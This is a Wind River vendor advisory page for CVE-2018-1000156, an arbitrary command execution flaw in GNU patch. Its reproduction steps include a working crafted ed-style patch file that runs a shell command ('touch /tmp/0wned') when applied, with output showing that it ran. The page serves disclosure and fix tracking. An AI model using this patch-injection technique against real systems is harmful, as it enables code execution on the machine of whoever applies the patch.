Wind River Support Network

HomeDefectsLIN10-3687
Fixed

LIN10-3687 : Security Advisory - patch - CVE-2018-1000156

Created: Apr 7, 2018    Updated: Dec 3, 2018
Resolved Date: May 1, 2018
Found In Version: 10.17.41.1
Fix Version: 10.17.41.7
Severity: Standard
Applicable for: Wind River Linux LTS 17
Component/s: Build & Config

Description

The problem was pointed out in several internet posts when someone found buried in the HN /new queue as a simple link to the Debian bug tracker. 

https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=894667#19

--

The steps to reproduce show the problem in more detail.  Hopefully a patch will be submitted for GNU patch to resolve the problem.


FreeBSD fixed a similar problem here:
https://www.freebsd.org/security/advisories/FreeBSD-SA-15:18.bsdpatch.asc

Steps to Reproduce

---- demonstration below ---

% cd /tmp
% cat<<EOF>evil.patch
--- /dev/null   2018-13-37 13:37:37.000000000 +0100                            
+++ b/beep.c    2018-13-37 13:38:38.000000000 +0100                            
1337a                                                                          
1,112d                                                                         
!touch /tmp/0wned; ls -la /tmp/0wned
.                                                                              
EOF
% touch beep.c
% patch < evil.patch 
?
?
-rw-r--r-- 1 jwessel users 0 Apr  5 15:58 /tmp/0wned
?
patch: **** ed FAILED

Other Downloads


CVEs


Live chat
Online